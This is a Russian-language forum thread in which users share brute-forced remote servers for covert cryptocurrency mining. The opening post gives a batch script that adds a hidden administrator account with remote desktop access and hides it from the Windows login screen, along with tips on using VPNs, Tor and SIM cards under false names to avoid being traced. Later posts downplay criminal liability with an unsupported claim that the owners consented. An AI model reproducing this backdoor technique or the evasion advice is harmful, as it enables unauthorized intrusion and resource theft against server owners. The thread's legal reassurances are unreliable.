Сервера для майнинга

Тема в разделе "Майнинг (общий раздел)", создана пользователем minerd, 9 май 2016.

  1. minerd

    minerd Новичок

    Всем провет.
    Т.к товарищ брутит сервера "для фана" и ему они не нужны, я решил поделится ими с теми, кто в них нуждается.
    перед тем, как использовать эти сервера:
    * Вы должны понимать, что все сервера "сбручены", т.е доступ к ним был получен с помощью программы которая сумела подобрать пароль к серверу, т.е получить "Несанкционированный доступ"
    [я написал владельцам серверов и они не против, чтобы на их серверах майнили, так что все законно, прим. админ]

    * Не наглейте, не используйте на дедиках все ресурсы, достаточно поставить майнер(параметр -t) так, что бы он не загружал цп более чем на 50%.

    * Не удаляйте Антивирусы, чей либо софт, не закрывайте вкладки браузера, тхт, какие либо документы.

    * Если при входе на дедик появляется сообщение о том, что там сидит кто то еще, не упарывайтесь, возьмите другой а тот оставьте на время, когда уйдет админ или второй юзер, куда спешить?

    * Используйте vpn, если брутите со своего пк, да и вообще даже при входе со своего пк на сбрученые дедики используйте прокси или тот же впн.

    * Для надежности, создайте себе несколько учеток и спрячьте их

    Cоздание учетки:
    Ниже текст для файла .bat который создаст и скроет вашу учетную запись с винлогина:

    Код:
    net user myuser mypassword /add
    net localgroup Administrators myuser/add
    net localgroup "Remote Desktop Users" myuser/add
    net accounts /maxpwage:unlimited
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ЛОГИН /t REG_DWORD /d "00000000" /f
    exit

    Не забудьте myuser заменить на свой логин(желательно придумать что то похожее на системный логин) и mypassword - на ваш пароль.
    Создайте тхт, назовем его user.txt, вставьте текст данный выше и переменяйте в user.bat, все, после этого на сбрученом дедике запускайте этот батник, выходите с учетки админа(которую сбрутили) и заходите со своим логином

    Полный пост тут: https://bitalk.org/threads/4260/

    сами сервера:

    Скрытое содержимое:
    **Скрытое содержимое: Для просмотра Вам необходимо минимум 10 сообщений на форуме.**
     
    Nord_vampir, Cryder, admin и ещё 1-му нравится это.
  2. Nimogsm

    Nimogsm 123 Проверенный

    Спасибо,было бы не плохо что бы каждый отписал что взял,что бы не перебирать все на свете.
     
  3. minerd

    minerd Новичок

    Перед публикацией все сервера были проверены чекером, по поводу того, что бы отписывались кто и какой взял - тут лишь вопрос порядочности тех, кто их забирает
     
  4. admin

    admin Администратор Команда форума

    Спрятал под хайд. Вообще пользуйтесь хайдом, выкладывая подобные вещи.
     
  5. admin

    admin Администратор Команда форума

    Я написал владельцам серверов они разрешили майнить, так что все законно. Но меры предосторожности все равно нужны, вдруг это подстава, поэтому пользуйтесь VPN.
     
    minerd нравится это.
  6. minerd

    minerd Новичок

    На счет согласия админов не знаю, но поверю админу на слово.
    Данные сервера я уже говорил что были "сбручены" софтом, поэтому пользуйтесь впн'ом, прокси или тор'ом, я писал об этом не однократно
     
  7. Nimogsm

    Nimogsm 123 Проверенный

    Вопрос:если я подключусь с вайфая с кафе и начну заходить на серваки,запущу там все,будет ли это безопасно?
     
  8. minerd

    minerd Новичок

    я бы рекомендовал вам сделать иначе, возьмите любой впн, даже можно фри, например hideme.ru/ (битая ссылка)
     
  9. admin

    admin Администратор Команда форума

    Вы на своем ноуте уже заходили в свой Контакт, где, разумеется, вписаны ваши реальные данные, в свою почту, до кучи еще в банк клиент. Поэтому, теоретически отследить вас можно, если ваш компьютер персонализирован. А если нет, то проблем не вижу, поэтому и запретили WIFI в кафе без паспорта, что сложно отследить. Можете использовать йоту, оформленную на левые данные - на авито объявлений куча. Местоположение йоты сложнее определить, чем местоположение мобильника, в конце концов вы можете заходить через йоту не из дома.

    И потом, мы говорим о статье 272?
    Во-первых мы получаем доступ к серверам с разрешения их владельцев. Но даже если бы это было не так, за что вас наказывать? Ну подобрали пароль, вы ничего не ломали, не копировали. У нас законодательство в отношении хакерства весьма мягкое, поэтому, по большому счету, вы можете использовать бесплатный VPN от Opera.
     
    Nimogsm нравится это.
  10. WorldTank

    WorldTank новичок

    подбор паролей и есть ст.272 незаконное проникновение
    2-3 года в сизо посидеть, если ничего другого не придумают то опустошат все карманы и выпустят
    для меня это былоб жестко а не мягко
     
  11. admin

    admin Администратор Команда форума

    В ст.272 есть 4 подпункта. Если мы говорим о 272 пункт 2 (взлом с корыстными целями), то взлом сервера с целью установки на него майнера и получения таким образом прибыли можно под нее подвести. В теории, а на практике это надо чтобы подозреваемый оговорил себя.
    И потом, вам дают уже готовые входы с согласия владельцев. Вы не подбирали пароль вы получили его легально на форуме.
     
  12. minerd

    minerd Новичок

    Из практики, могу сказать так - если Вы используете сервера только для майнинга, не пакостите там, ставя какой то лишний софт, спамеры или еще чего-то подобное, не забиваете канал интернета(обычно на всех почти серверах стоят сайты/сервисы), не удаляете софт владельцев, никогда не ставьте локкеры - проблем у Вас не будет ни со стороны хозяев, ни тем более с законом, максимум что сделает хозяин дедика - это просто удалит Ваш майнер и поменяет пароль для входа на сервер.
    Сервера выше - ни одного сервера нет из RU/UKR и стран СНГ
     
    admin нравится это.
  13. admin

    admin Администратор Команда форума

    Так это и понятно а народ все равно боится. На этом и держится управление страной. Тех, кто не боялся, сгнобили в СССР, а сегодня россияне это потомки тех, кто боялся. Постоянно с этим сталкиваюсь и вижу. Прежде чем бояться -проанализируйте риски.
     
    andbbk, WorldTank и Cryder нравится это.
  14. Cryder

    Cryder Гость

    Вот-вот! Сам со своими друзьями такие темы поднимаем. И ведь не просто приучили боятся, но и приучили чернью ходить (если так можно сказать). То бишь, приучили работать (пахать как лошадей). При этом внушили так, что до костей прониклись. Отбили любые мысли зарабатывать и работать на себя.
     
  15. admin

    admin Администратор Команда форума

    Да, какие-то страны преуспели в робототехнике, какие-то в IT, какие-то в фармакологии, космических разработках, научных открытиях и т.п., а мы преуспели в служении господину, пожалуй, на втором месте после Северной Кореи. Даже белорусы так не ублажают своего царя, не смотря на более жесткую диктатуру. У нас герои и примеры для подражания обычные бандиты, которые внушают страх. Кто такие, скажем, герои сериала Бригада - обычные паразиты. По сценарию они там что-то полезное для общества делают, но если бы не сделали, их бы не стали меньше любить и хотеть им подражать.

    Ладно, не будем превращать тему в флуд.
     
    minerd и Cryder нравится это.
  16. Cryder

    Cryder Гость

    Еще бы не быть нубом в этих делах и воспользоваться предоставленной халвой. ТС, где можно подробно для нубов изучить даную тематику?
     
  17. minerd

    minerd Новичок

    сейчас напишу не большой FAQ по использованию, ссылку продублирую в шапке темы
     
    Cryder нравится это.
  18. minerd

    minerd Новичок

  19. Nord_vampir

    Nord_vampir Постоянный пользователь

    А как майнеры заливать на эти сервера
     
  20. Nord_vampir

    Nord_vampir Постоянный пользователь

    И еще вопрос это надо зайти постаить дэдик запустить туда манер пусть даже с параметром -t но если таких пользователей будет много и майнеров на них тоже много будет стоять
     
  21. minerd

    minerd Новичок

    все будет иначе, каждый из майнеров будет перебивать друг друга, тем самым мешая 2-3, они же в свою очередь будут делать это же 1
     
  22. Nord_vampir

    Nord_vampir Постоянный пользователь

    Сами то поняли что написали?:)
     
  23. Nord_vampir

    Nord_vampir Постоянный пользователь

    Блин вроде уже есть 10 сообщений на форуме а список дедиков так и не доступен
     
  24. Nord_vampir

    Nord_vampir Постоянный пользователь

    А вообще если на дэдиках майнить то быстрее добыча идет?
     
  25. minerd

    minerd Новичок

    понял.
    Смотрите, если запустить один и тот же майнер на одном пк, либо два разных, получиться так, что каждый из них будет пытаться перебить "конкурента", разве что установить для майнера "приоритет", но я не пробовал
    чем больше серверов - больше и скорость, соотв. и прибыль
     
    Nord_vampir нравится это.
  26. Nord_vampir

    Nord_vampir Постоянный пользователь

    Из списка удалось забрутить два дедика нормально так хэшрейт поднялся хотелось бы еще списочек
     
  27. skish85

    skish85 кидала

    видел тебя на 1 из взятых мной. Ты че,монеро майнишь?:D:D:D XMG недавно даваллбольше всего, но ща трабла какая то там. Долби ESP,лей на нову и в маркете ESP ставь ордера на разные монеты (придется с калькулем посидеть, но выхлоп очень хороший, так как там регулярно кто то путает педали, я потихоньку сливаю по 0,5 - 1,5 сатоши . Иногда просто на лайт меняю.:))
     
    Nord_vampir нравится это.
  28. Nord_vampir

    Nord_vampir Постоянный пользователь

    По русски можно то же самое :)
     
  29. Nord_vampir

    Nord_vampir Постоянный пользователь

    Манеро славно майнится по чему бы и не майнить?
     
    skish85 нравится это.
  30. dragon-eth

    dragon-eth новичок

    Всем привет. если честно я чуть не понял.. что за сервера.. кто нибудь может объяснить?
     
  31. Nord_vampir

    Nord_vampir Постоянный пользователь

    дедики это, удаленные компьютеры если на русский язык то есть компьютер который находится далеко.
     
  32. dragon-eth

    dragon-eth новичок

    это я понял.. я имел ввиду что сервера как бы то же самое что и пулы на которые я могу разместить свои фермы? или наоборот, эти удаленные компы могу подцепить на свой пул?
    я просто ищу мощностя для своего пула. а тут как я понял это не то что я понял
     
  33. Nord_vampir

    Nord_vampir Постоянный пользователь

    Можешь подцепить их на другие пулы и на свой пул
     
  34. dragon-eth

    dragon-eth новичок

    ааа.. всетаки это компы которые могу подцепить на свой пул
    это прекрасно. надо попробовать
     
  35. Nord_vampir

    Nord_vampir Постоянный пользователь

    Только из списка который тут есть все уже разобраны
     
  36. dragon-eth

    dragon-eth новичок

    Жаль. (( у тебя много мощности?
     
  37. Nord_vampir

    Nord_vampir Постоянный пользователь

    Мало !!! к Сожалению!
     
  38. Nimogsm

    Nimogsm 123 Проверенный

    У кого вдруг есть вдруг не нужные дедики скиньте в личку,взамен угощу червонцами)
     
  39. disaman

    disaman новичок

    +1, чем смогу - отблагодарю
     
  40. domine

    domine новичок

    Почему не видно сервера?
     
  41. skish85

    skish85 кидала

    а куда вампири подевался? я уже начинаю думать что это сашка суралмашка
     
  42. Nord_vampir

    Nord_vampir Постоянный пользователь

    в смысле?
     
  43. Nord_vampir

    Nord_vampir Постоянный пользователь

    нет мы разные человеки сашку сам недели три немогу дооратся
     
  44. skish85

    skish85 кидала

    хорошо что нашлись. если занимаешься , то скинь контакт в личку по которому тебя найти можно.
     
  45. domine

    domine новичок

    "Cкрытое содержимое..." У меня эта ссылка не открывается.
     
  46. Nord_vampir

    Nord_vampir Постоянный пользователь

    сообщений малонаверное но ты вряд ли что из той ссылки сейчас найдешь рабочее
     
  47. Nord_vampir

    Nord_vampir Постоянный пользователь

    хорошо сейчас кину
     
  48. domine

    domine новичок

    Ясно. Спасибо. Очень жаль, что ссылки не рабочие. Хотелось попробовать.
     
  49. Nord_vampir

    Nord_vampir Постоянный пользователь

    попробуй набить сообщений там по моему 10 штук всего надо
     
  50. domine

    domine новичок

    В любую тему писать? Я в этом сайте - форуме недавно, плохо ориентируюсь. Не хочу флудить.
     
  51. Nord_vampir

    Nord_vampir Постоянный пользователь

    да влюбую
     
    domine нравится это.
  52. domine

    domine новичок

    Спасибо!
     
  53. disaman

    disaman новичок

    занятный способ набивания сообщений. мне еще 8 надо ;(
     
  54. minerd

    minerd Новичок

    Nord_vampir, не стоит подвигать людей на "набивание постов" - любые сообщения не несущие в себе смысловой нагрузки в тематических разделах - являются флудом/спамом, что прописано в правилах как нарушение - за которое пользователь будет наказан.
    И пожалуйста, все общения не потеме - в лс обсуждайте.
     
  55. федор

    федор новичок

    бесплатный сыр бывает) но спрос на него такой, что кто успел тот и сьел)
     
  56. domine

    domine новичок

    Прочитал тему всю. Как делать так и не врубился. Может кто "разжуёт" по - понятней? Времени особо углубляться и изучать эту тему пока нет, хочется быстро( нажал - открыл - скачал - загрузил - просканировал - установил - запустил - спрятал - контролируешь, что вроде такого алгоритма). Можно в личку, можно в теме, можно отдельную инструкцию создать.
     
  57. Дени1

    Дени1 Бывалый

    Что то я не совсем понял, как на этих серверах майнить
     
  58. Nimogsm

    Nimogsm 123 Проверенный

    сервер- полноценный пк.Все те же действия что и на пк.скачал майнер запустил.готово.
     
  59. Дени1

    Дени1 Бывалый

    Понятно, с сколько там вообще можно намайнить сатошей к примеру в сутки
     
  60. Nimogsm

    Nimogsm 123 Проверенный

    Все зависит от самого пк,сказть не возможно.
     
  61. Дени1

    Дени1 Бывалый

    Я понимаю, но на средней конфигурации к примеру сколько будет если
     
  62. Serg281116

    Serg281116 новичок

    Майнить хочется на надежных серверах. Если не жалко поделитесь ссылкой.
     
  63. Nimogsm

    Nimogsm 123 Проверенный

    Отвечу сразу на многие вопросы:
    Сервера бывают от 1 ядра и нного количества.
    Майнинг происходит только на цпу.
    Сервера дают от 30h/s на криптоноте,а именно бцн монеро и прочее.
    Подсчитать доходность есть масса калькуляторов.
     
  64. okela

    okela Продвинутый крипто-юзверь Проверенный

    Надежные выделенные сервера - это те, которые сам выберешь и арендуешь легально.
     
  65. Serg281116

    Serg281116 новичок

    Кто-то майнит сибкойн. Я все делаю по инсрукции, но что-то не получается. Может требуется сервер арендовать?
     
  66. FanatMonet

    FanatMonet Новичок

    да там особо не намайнишься,даже если майнить в пользе,то 1/2 монеты в 2-3 дня это потолок
     
  67. solohorse

    solohorse новичок

    Я немножко тупой. Как подключиться к серверу, если уже знаешь пароль?
     
  68. alexrou

    alexrou новичок

    Народ киньте пару дедиков ненужных!
     
  69. LINKOLN26

    LINKOLN26 новичок

    Я пользуюсь этим сайтом для майнинга http://ru.bitclub.network/akhmet689z очень доволен , майнить тут легко , есть конечно и свои минусы , но они не значительные , мощная платформа !рекомендую
     
  70. kampaster

    kampaster Катарсис - Hold Fast

    Пуск->Все программы->Стандартные->Подключение к удаленному рабочему столу
    (c) windows 7
     
  71. Alex16077

    Alex16077 новичок

  72. Андрей Матюш

    Андрей Матюш новичок

    Можно ли заниматься майнингом на сибкойне? Или это прошлый век?
     
  73. Olezhik

    Olezhik новичок

    Кто считает реально ли поймать ферму по низкой цене? А то я как не найду там цены больше миллиона, а по факту цена не больше 200тыс. Стоит ли оно того?
     
  74. drago

    drago новичок

    А у меня вот такой вопрос. Меня интересует майнинг eth, но из техники только ноутбук, то есть прямая дорога только майнить в пуле. Но как найти хороший пул, вот к примеру об этом что можете сказать https://ru.hashcity.org/ и сколько можно намайнить за ночь?
     
  75. okela

    okela Продвинутый крипто-юзверь Проверенный

    Дружище, для того чтобы майнить кефир - тебе прямая дорога не на пул для майнинга, а в ближайший магазин компьютерной техники за системником с хорошей видяхой. :)
     
  76. Ryazik

    Ryazik новичок

    Нашел майнинг прогу вроде пока норм, плюс в том что подстраивается под железо. может кому то интересно
     
  77. okela

    okela Продвинутый крипто-юзверь Проверенный

    Сам-то уже пробовал юзать эту прогу ? Какое железо, какой выхлоп получается ?
     
  78. LOFT

    LOFT новичок

    Зачем?